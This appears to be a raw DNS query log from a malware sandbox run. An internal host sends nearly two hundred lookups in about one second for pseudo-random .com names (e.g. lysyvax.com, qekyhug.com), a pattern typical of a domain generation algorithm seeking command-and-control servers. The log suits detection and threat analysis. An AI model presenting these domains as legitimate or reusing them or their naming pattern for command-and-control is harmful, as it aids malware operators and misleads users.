Aug 23, 2024 18:43:33.561315060 CEST	192.168.2.5	1.1.1.1	0xf526	Standard query (0)	lysyvax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.561500072 CEST	192.168.2.5	1.1.1.1	0x1b39	Standard query (0)	vonyryk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.561631918 CEST	192.168.2.5	1.1.1.1	0xdd70	Standard query (0)	qekyhug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.561790943 CEST	192.168.2.5	1.1.1.1	0x4e1a	Standard query (0)	pupycop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.561942101 CEST	192.168.2.5	1.1.1.1	0xbf3	Standard query (0)	ganyrew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.562103033 CEST	192.168.2.5	1.1.1.1	0x9b66	Standard query (0)	lykygun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.562228918 CEST	192.168.2.5	1.1.1.1	0x59f2	Standard query (0)	vopycoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.562372923 CEST	192.168.2.5	1.1.1.1	0xd025	Standard query (0)	qebyrel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.562500954 CEST	192.168.2.5	1.1.1.1	0xd5a4	Standard query (0)	pujygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.562625885 CEST	192.168.2.5	1.1.1.1	0x3911	Standard query (0)	gatycis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.562760115 CEST	192.168.2.5	1.1.1.1	0x97c4	Standard query (0)	lyvywar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.562890053 CEST	192.168.2.5	1.1.1.1	0x3bf3	Standard query (0)	vojygym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.563030005 CEST	192.168.2.5	1.1.1.1	0xeb5a	Standard query (0)	qetyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.563182116 CEST	192.168.2.5	1.1.1.1	0x5f59	Standard query (0)	puvywal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.563327074 CEST	192.168.2.5	1.1.1.1	0xf950	Standard query (0)	gahyfyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.563500881 CEST	192.168.2.5	1.1.1.1	0x1071	Standard query (0)	lyryxud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.564707994 CEST	192.168.2.5	1.1.1.1	0xb48c	Standard query (0)	vocyqot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.565737009 CEST	192.168.2.5	1.1.1.1	0xcbb4	Standard query (0)	qegyfeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.565999985 CEST	192.168.2.5	1.1.1.1	0x7e2d	Standard query (0)	puryxuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.566271067 CEST	192.168.2.5	1.1.1.1	0xa94c	Standard query (0)	gacyqoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.566334009 CEST	192.168.2.5	1.1.1.1	0xf356	Standard query (0)	lygyfej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.566603899 CEST	192.168.2.5	1.1.1.1	0xf270	Standard query (0)	vowyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.567086935 CEST	192.168.2.5	1.1.1.1	0xd540	Standard query (0)	qexyqip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.567320108 CEST	192.168.2.5	1.1.1.1	0x84cb	Standard query (0)	pufydaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.567363977 CEST	192.168.2.5	1.1.1.1	0x7fd6	Standard query (0)	gaqyzyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.567663908 CEST	192.168.2.5	1.1.1.1	0x79de	Standard query (0)	lyxymix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.567799091 CEST	192.168.2.5	1.1.1.1	0x3dc7	Standard query (0)	vofydak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.567982912 CEST	192.168.2.5	1.1.1.1	0x4466	Standard query (0)	puzymup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.568130016 CEST	192.168.2.5	1.1.1.1	0xdb33	Standard query (0)	qeqylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.568229914 CEST	192.168.2.5	1.1.1.1	0x86f5	Standard query (0)	gadydow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.730947971 CEST	192.168.2.5	1.1.1.1	0x4d86	Standard query (0)	lymylen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.731538057 CEST	192.168.2.5	1.1.1.1	0x6c1f	Standard query (0)	volymuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.732203007 CEST	192.168.2.5	1.1.1.1	0x2f06	Standard query (0)	qedysol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.732827902 CEST	192.168.2.5	1.1.1.1	0x47d3	Standard query (0)	pumyleg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.733136892 CEST	192.168.2.5	1.1.1.1	0x321	Standard query (0)	lysysir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.733669996 CEST	192.168.2.5	1.1.1.1	0x8ea	Standard query (0)	vonykam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.734002113 CEST	192.168.2.5	1.1.1.1	0x2cb8	Standard query (0)	pupypil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.734019995 CEST	192.168.2.5	1.1.1.1	0x756d	Standard query (0)	qekynyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.734651089 CEST	192.168.2.5	1.1.1.1	0xb5a0	Standard query (0)	ganykah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.734668970 CEST	192.168.2.5	1.1.1.1	0xf700	Standard query (0)	lykynyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.735137939 CEST	192.168.2.5	1.1.1.1	0x496d	Standard query (0)	vopyput.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.735492945 CEST	192.168.2.5	1.1.1.1	0xe795	Standard query (0)	qebykoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.735975981 CEST	192.168.2.5	1.1.1.1	0x40cc	Standard query (0)	pujybev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.736438990 CEST	192.168.2.5	1.1.1.1	0x918a	Standard query (0)	gatypuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.736742020 CEST	192.168.2.5	1.1.1.1	0x615f	Standard query (0)	lyvyjoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.736855030 CEST	192.168.2.5	1.1.1.1	0xd803	Standard query (0)	vojybef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.737236977 CEST	192.168.2.5	1.1.1.1	0x18	Standard query (0)	qetytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.737612009 CEST	192.168.2.5	1.1.1.1	0x29f1	Standard query (0)	lyrytyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.737840891 CEST	192.168.2.5	1.1.1.1	0xef56	Standard query (0)	gahyvab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.739444017 CEST	192.168.2.5	1.1.1.1	0x48f3	Standard query (0)	vocyjik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.740695953 CEST	192.168.2.5	1.1.1.1	0x81e4	Standard query (0)	galynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.740729094 CEST	192.168.2.5	1.1.1.1	0xc19c	Standard query (0)	lygyvon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.740911961 CEST	192.168.2.5	1.1.1.1	0x7436	Standard query (0)	qegyvag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741036892 CEST	192.168.2.5	1.1.1.1	0xa20e	Standard query (0)	purytyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741274118 CEST	192.168.2.5	1.1.1.1	0x855f	Standard query (0)	vowyrec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741313934 CEST	192.168.2.5	1.1.1.1	0x48c0	Standard query (0)	gacyhuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741441965 CEST	192.168.2.5	1.1.1.1	0xbafd	Standard query (0)	pufycog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741647005 CEST	192.168.2.5	1.1.1.1	0xa817	Standard query (0)	lyxygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741796970 CEST	192.168.2.5	1.1.1.1	0x25c5	Standard query (0)	gaqyres.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.741803885 CEST	192.168.2.5	1.1.1.1	0x8ed9	Standard query (0)	vofycim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742063046 CEST	192.168.2.5	1.1.1.1	0xca5e	Standard query (0)	qexyhul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742074013 CEST	192.168.2.5	1.1.1.1	0xb3ee	Standard query (0)	qeqyrav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742259026 CEST	192.168.2.5	1.1.1.1	0xb135	Standard query (0)	puzygyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742475986 CEST	192.168.2.5	1.1.1.1	0xf50	Standard query (0)	puvyjiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742521048 CEST	192.168.2.5	1.1.1.1	0x90f7	Standard query (0)	gadycih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742672920 CEST	192.168.2.5	1.1.1.1	0x6687	Standard query (0)	lymywad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742866993 CEST	192.168.2.5	1.1.1.1	0x9272	Standard query (0)	volygyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.742971897 CEST	192.168.2.5	1.1.1.1	0xf0a5	Standard query (0)	qedyxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.743383884 CEST	192.168.2.5	1.1.1.1	0x5483	Standard query (0)	galyfez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.743555069 CEST	192.168.2.5	1.1.1.1	0xa684	Standard query (0)	lysyxuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.743732929 CEST	192.168.2.5	1.1.1.1	0x2155	Standard query (0)	qekyfep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.743833065 CEST	192.168.2.5	1.1.1.1	0x9fdb	Standard query (0)	pupyxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744107962 CEST	192.168.2.5	1.1.1.1	0x4f47	Standard query (0)	pumywov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744282961 CEST	192.168.2.5	1.1.1.1	0xac57	Standard query (0)	ganyqib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744391918 CEST	192.168.2.5	1.1.1.1	0x655b	Standard query (0)	vonyqof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744592905 CEST	192.168.2.5	1.1.1.1	0xe498	Standard query (0)	pujydap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744635105 CEST	192.168.2.5	1.1.1.1	0x5531	Standard query (0)	gatyzyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.744792938 CEST	192.168.2.5	1.1.1.1	0x716	Standard query (0)	lyvymun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745012999 CEST	192.168.2.5	1.1.1.1	0xd599	Standard query (0)	vojydoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745166063 CEST	192.168.2.5	1.1.1.1	0x7c2	Standard query (0)	lykyfax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745328903 CEST	192.168.2.5	1.1.1.1	0xf64a	Standard query (0)	puvymug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745392084 CEST	192.168.2.5	1.1.1.1	0x87fd	Standard query (0)	qebyqig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745577097 CEST	192.168.2.5	1.1.1.1	0xce3e	Standard query (0)	gahydos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745754957 CEST	192.168.2.5	1.1.1.1	0x1cbc	Standard query (0)	qetylel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.745908976 CEST	192.168.2.5	1.1.1.1	0x2ee	Standard query (0)	lyryler.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746109962 CEST	192.168.2.5	1.1.1.1	0xcef3	Standard query (0)	vocymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746141911 CEST	192.168.2.5	1.1.1.1	0xff43	Standard query (0)	qegysiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746309042 CEST	192.168.2.5	1.1.1.1	0x140	Standard query (0)	purylal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746469975 CEST	192.168.2.5	1.1.1.1	0x918c	Standard query (0)	gacynyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746594906 CEST	192.168.2.5	1.1.1.1	0x4b0c	Standard query (0)	lygysid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746640921 CEST	192.168.2.5	1.1.1.1	0xf9	Standard query (0)	vowykat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746838093 CEST	192.168.2.5	1.1.1.1	0x2db5	Standard query (0)	qexynyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.746984959 CEST	192.168.2.5	1.1.1.1	0x7225	Standard query (0)	pufypuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.747129917 CEST	192.168.2.5	1.1.1.1	0x5a8d	Standard query (0)	vopyzyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.280989885 CEST	192.168.2.5	1.1.1.1	0x9a2e	Standard query (0)	gaqykoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.281591892 CEST	192.168.2.5	1.1.1.1	0x2068	Standard query (0)	lyxynej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.282339096 CEST	192.168.2.5	1.1.1.1	0x18c	Standard query (0)	vofypuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.283092976 CEST	192.168.2.5	1.1.1.1	0xf549	Standard query (0)	qeqykop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.283691883 CEST	192.168.2.5	1.1.1.1	0xed71	Standard query (0)	puzybeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.284533978 CEST	192.168.2.5	1.1.1.1	0x80e6	Standard query (0)	gadypub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.284828901 CEST	192.168.2.5	1.1.1.1	0xa5d4	Standard query (0)	lymyjix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.285233021 CEST	192.168.2.5	1.1.1.1	0xbbc9	Standard query (0)	volybak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.285479069 CEST	192.168.2.5	1.1.1.1	0x2f90	Standard query (0)	qedytyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.285913944 CEST	192.168.2.5	1.1.1.1	0x7a7f	Standard query (0)	galyvaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.286444902 CEST	192.168.2.5	1.1.1.1	0x4e93	Standard query (0)	lysytyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.286672115 CEST	192.168.2.5	1.1.1.1	0xd134	Standard query (0)	qekyvol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.286720037 CEST	192.168.2.5	1.1.1.1	0x73d9	Standard query (0)	vonyjuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.287337065 CEST	192.168.2.5	1.1.1.1	0xd672	Standard query (0)	ganyhus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.287480116 CEST	192.168.2.5	1.1.1.1	0x6761	Standard query (0)	pupyteg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.287820101 CEST	192.168.2.5	1.1.1.1	0x38a9	Standard query (0)	lykyvor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.288300037 CEST	192.168.2.5	1.1.1.1	0x7d98	Standard query (0)	vopyrem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.288645983 CEST	192.168.2.5	1.1.1.1	0xd6ef	Standard query (0)	qebyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.288674116 CEST	192.168.2.5	1.1.1.1	0x393e	Standard query (0)	pujycil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.289302111 CEST	192.168.2.5	1.1.1.1	0x3c26	Standard query (0)	lyvygyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.289557934 CEST	192.168.2.5	1.1.1.1	0x101c	Standard query (0)	vojycit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.289618015 CEST	192.168.2.5	1.1.1.1	0x3701	Standard query (0)	gatyrah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.290163040 CEST	192.168.2.5	1.1.1.1	0xec85	Standard query (0)	qetyraq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.290502071 CEST	192.168.2.5	1.1.1.1	0x289c	Standard query (0)	puvygyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.290817022 CEST	192.168.2.5	1.1.1.1	0x75a4	Standard query (0)	gahycuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.291107893 CEST	192.168.2.5	1.1.1.1	0xd8f6	Standard query (0)	lyrywoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.291527033 CEST	192.168.2.5	1.1.1.1	0x2f38	Standard query (0)	vocygef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.291989088 CEST	192.168.2.5	1.1.1.1	0x2252	Standard query (0)	qegyxup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.292247057 CEST	192.168.2.5	1.1.1.1	0x27f1	Standard query (0)	gacyfeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.292282104 CEST	192.168.2.5	1.1.1.1	0xa9ca	Standard query (0)	purywoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.292918921 CEST	192.168.2.5	1.1.1.1	0x6f95	Standard query (0)	lygyxux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.295458078 CEST	192.168.2.5	1.1.1.1	0x4e41	Standard query (0)	vowyqik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.295838118 CEST	192.168.2.5	1.1.1.1	0x4c05	Standard query (0)	qexyfag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.298980951 CEST	192.168.2.5	1.1.1.1	0xa15	Standard query (0)	pumyjip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.299146891 CEST	192.168.2.5	1.1.1.1	0x77b1	Standard query (0)	gaqyqiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.299146891 CEST	192.168.2.5	1.1.1.1	0x4c20	Standard query (0)	pufyxyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.299351931 CEST	192.168.2.5	1.1.1.1	0x1c03	Standard query (0)	vofyzyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.299911022 CEST	192.168.2.5	1.1.1.1	0x746f	Standard query (0)	lyxyfan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300079107 CEST	192.168.2.5	1.1.1.1	0x392f	Standard query (0)	puzydog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300180912 CEST	192.168.2.5	1.1.1.1	0x8940	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300378084 CEST	192.168.2.5	1.1.1.1	0xf058	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300415993 CEST	192.168.2.5	1.1.1.1	0xe0c0	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300605059 CEST	192.168.2.5	1.1.1.1	0x2105	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300753117 CEST	192.168.2.5	1.1.1.1	0xe397	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300870895 CEST	192.168.2.5	1.1.1.1	0x8d78	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.300921917 CEST	192.168.2.5	1.1.1.1	0x3818	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301131010 CEST	192.168.2.5	1.1.1.1	0xbb43	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301240921 CEST	192.168.2.5	1.1.1.1	0x610	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301484108 CEST	192.168.2.5	1.1.1.1	0x38e6	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301636934 CEST	192.168.2.5	1.1.1.1	0xd18e	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301702023 CEST	192.168.2.5	1.1.1.1	0x1846	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.301785946 CEST	192.168.2.5	1.1.1.1	0x7b6a	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.302205086 CEST	192.168.2.5	1.1.1.1	0x88d4	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.302216053 CEST	192.168.2.5	1.1.1.1	0xf62f	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.302454948 CEST	192.168.2.5	1.1.1.1	0x4d8d	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.302860975 CEST	192.168.2.5	1.1.1.1	0xa59	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303035021 CEST	192.168.2.5	1.1.1.1	0xfe93	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303124905 CEST	192.168.2.5	1.1.1.1	0x8080	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303224087 CEST	192.168.2.5	1.1.1.1	0x8380	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303388119 CEST	192.168.2.5	1.1.1.1	0x529c	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303587914 CEST	192.168.2.5	1.1.1.1	0x82f6	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.303600073 CEST	192.168.2.5	1.1.1.1	0xb58	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.304208040 CEST	192.168.2.5	1.1.1.1	0x2beb	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.304336071 CEST	192.168.2.5	1.1.1.1	0x30fc	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.304485083 CEST	192.168.2.5	1.1.1.1	0x47b2	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.304687023 CEST	192.168.2.5	1.1.1.1	0x2c9c	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.305105925 CEST	192.168.2.5	1.1.1.1	0xc41e	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.305143118 CEST	192.168.2.5	1.1.1.1	0x48fb	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.305365086 CEST	192.168.2.5	1.1.1.1	0x7df9	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.305392981 CEST	192.168.2.5	1.1.1.1	0x36f	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.305561066 CEST	192.168.2.5	1.1.1.1	0x4ad3	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.305774927 CEST	192.168.2.5	1.1.1.1	0x954a	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.305892944 CEST	192.168.2.5	1.1.1.1	0x6df3	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306055069 CEST	192.168.2.5	1.1.1.1	0x7f84	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306202888 CEST	192.168.2.5	1.1.1.1	0x848f	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306358099 CEST	192.168.2.5	1.1.1.1	0x88e9	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306499958 CEST	192.168.2.5	1.1.1.1	0x7d4e	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306627035 CEST	192.168.2.5	1.1.1.1	0x6b15	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306657076 CEST	192.168.2.5	1.1.1.1	0xfc9e	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306804895 CEST	192.168.2.5	1.1.1.1	0xee04	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.306982994 CEST	192.168.2.5	1.1.1.1	0xa603	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.307025909 CEST	192.168.2.5	1.1.1.1	0x3798	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.307261944 CEST	192.168.2.5	1.1.1.1	0x3670	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.307441950 CEST	192.168.2.5	1.1.1.1	0xab57	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.307602882 CEST	192.168.2.5	1.1.1.1	0x7941	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.307710886 CEST	192.168.2.5	1.1.1.1	0xb739	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.307796955 CEST	192.168.2.5	1.1.1.1	0x84ac	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.307893038 CEST	192.168.2.5	1.1.1.1	0x27e1	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.308082104 CEST	192.168.2.5	1.1.1.1	0x5471	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.308207989 CEST	192.168.2.5	1.1.1.1	0xa0a9	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.308388948 CEST	192.168.2.5	1.1.1.1	0x7cdd	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.308429003 CEST	192.168.2.5	1.1.1.1	0x4a0b	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.308587074 CEST	192.168.2.5	1.1.1.1	0x786b	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.308729887 CEST	192.168.2.5	1.1.1.1	0xf376	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
